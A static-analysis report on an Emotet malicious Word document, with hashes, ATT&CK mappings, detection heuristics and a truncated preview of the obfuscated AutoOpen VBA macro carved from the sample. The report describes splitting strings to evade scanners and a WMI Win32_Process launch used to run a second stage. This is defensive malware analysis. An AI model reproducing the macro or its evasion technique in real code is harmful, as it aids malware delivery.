Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 9ff3aaa377fbdb25…

MALICIOUS

Office (OLE)

Size: 193.1 KB
Created: 2019-04-12 12:20:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: f9cddfaf2fe76b59153d2ae8380cfd95
SHA-1: 2011620c9c98d2c86c0d149896869f578132191f
SHA-256: 9ff3aaa377fbdb25692e2c9624a684af93324259564ac9921f31b439d9be3e22
Risk Score: 342

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1059 Command and Scripting Interpreter

The sample contains a VBA macro with an autoopen subroutine that uses GetObject and CreateObject to reach the Win32_Process WMI object and start a new process. This is a common Emotet technique for downloading and executing a second-stage payload. The macro is also obfuscated: keywords such as 'winmgmts' are split into short string fragments and reassembled at runtime so that no single literal matches a keyword scanner.

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-6939171-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6939171-0
  • VBA macros detected [medium] (5 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenations is done only to evade keyword scanning.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 34038 bytes
SHA-256: f04d753af27d91a0e78774645f5cf999f07ed12a4e0b8b24b727d2cfb5ff275c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UZxAXDAc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fA_AXGwk"
Attribute VB_Base = "0{35737B33-D264-413F-A283-644C8B2A5A08}{D32AB7A6-ADEF-49C6-8D1E-29C4680F564D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "JACxAGo"
Attribute VB_Base = "0{807BA783-60FE-49A8-8200-7B67AB2DBCC2}{1D3D10F9-0479-4405-85E3-721E96B778F7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "uwUAUA"
Sub autoopen()
   If i1GA4AA = ID1k4ZA Then
      oxwx__ = cAAkQA - RAAA_A
      Select Case wAUAB4
         Case 588386181
            kkUXQAw1 = CVar(554295234 * Rnd(bAAAAA * Round(256948051) / 348690530 * CLng(570690348 * Sqr(zDDkAD4Z))))
            NAAAUo = Round(FZABG4Z)
         Case 681351160
            aDw1XB = EAGAUAA
            IAUXA_ = Atn(1732346)
      End Select
   End If
   If TDkAkA4 = hUBkxD Then
      IZAQUQQA = AxwcQA - pGoZBAA
      Select Case BQADQAk
         Case 208457868
            ncA4UkAB = CVar(327734327 * Rnd(wCBUAABG * Round(929152027) / 823496219 * CLng(975040109 * Sqr(ZQBkA1))))
            HxQA_AZU = Round(ZkQDBA)
         Case 713194317
            OQGAQAx = MAAAoAAA
            pXA1UQZk = Atn(538810215)
      End Select
   End If
   vADXZUZ
   If j_kwAAA = nU_QQ4 Then
      jCGwoAcU = GDAwcx1x - jAAAA_
      Select Case pXAZAxZ
         Case 265077919
            oUAZ1D = CVar(791718496 * Rnd(bUA_QAD * Round(64452510) / 428964906 * CLng(621909268 * Sqr(WAAAAQA))))
            lUAxwAAk = Round(XUCAkD)
         Case 727906753
            TCDAQAD = fA1AUQAU
            Po_CZDc = Atn(70216692)
      End Select
   End If
   If EAZAAQA = i_1cwA Then
      IwXXCc = TAwAZw - pAAwDZUk
      Select Case OAZAx1
         Case 738969049
            rG_kAxAU = CVar(475095808 * Rnd(jAABXBcw * Round(972708045) / 656830629 * CLng(505218073 * Sqr(pUAGxxA))))
            RUAAZGXB = Round(UUZBAC)
         Case 140385174
            bAAABA = d4G_QA
            sQBD1x = Atn(121502054)
      End Select
   End If
   If ZDAAkGA4 = OUUc4UA Then
      UDoAXGUA = Z1kQGBQw - NBAUZB
      Select Case p_xAAG_
         Case 351942139
            jDAQCUU = CVar(350407286 * Rnd(BAAAoD_ * Round(828487293) / 197963892 * CLng(202889132 * Sqr(HDDoBAA))))
            QCk4XG = Round(XcAUA1D)
         Case 664271870
            vwAAUUxC = Doc1UA
            jBUGUwA = Atn(222017012)
      End Select
   End If
End Sub

Attribute VB_Name = "cADAAQ"
Function vADXZUZ()
   On Error Resume Next
   If DQX_coB_ = OwA1Qk Then
      kGQoBkA4 = M4GAkwD - nAcUcGA
      Select Case FAkUDB
         Case 866480215
            KCDkDA = CVar(366197351 * Rnd(SBDCwAG * Round(285581266) / 265808453 * CLng(729311465 * Sqr(KUUAZ1A))))
            DB_cooD = Round(hAQAD4)
         Case 92158483
            LAAAkU = cDcBxx
            OAACDx1G = Atn(209100693)
      End Select
   End If
   If M4AQQ4k = nQAUCAAk Then
      joDck1ZC = aAAD4A - kZ1UDcU
      Select Case W4AUQBAA
         Case 578658808
            bwAGBZU = CVar(318961311 * Rnd(pAcDAw_ * Round(307223537) / 781895672 * CLng(98801211 * Sqr(WDAwAco))))
            AAUA_wAA = Round(DAAAQAA)
         Case 102899066
            AAAADAXA = WAQQQ1
            wxAZXZQ = Atn(170302334)
      End Select
   End If
   If 4338 < 82790 Then
      iAAAZ4 = 0
      If KDA4AAAc = EB4UABAA Then
         rU_QcA = GXCBUAU - zAAA1AAA
         Select Case JAxACUAA
            Case 828487660
               hcQAokBQ = CVar(862481011 * Rnd(vADXcA * Round(529826407) / 746932916 * CLng(719578481 * Sqr(UAAkCcAG))))
               lxA_AAAZ = 
... (truncated)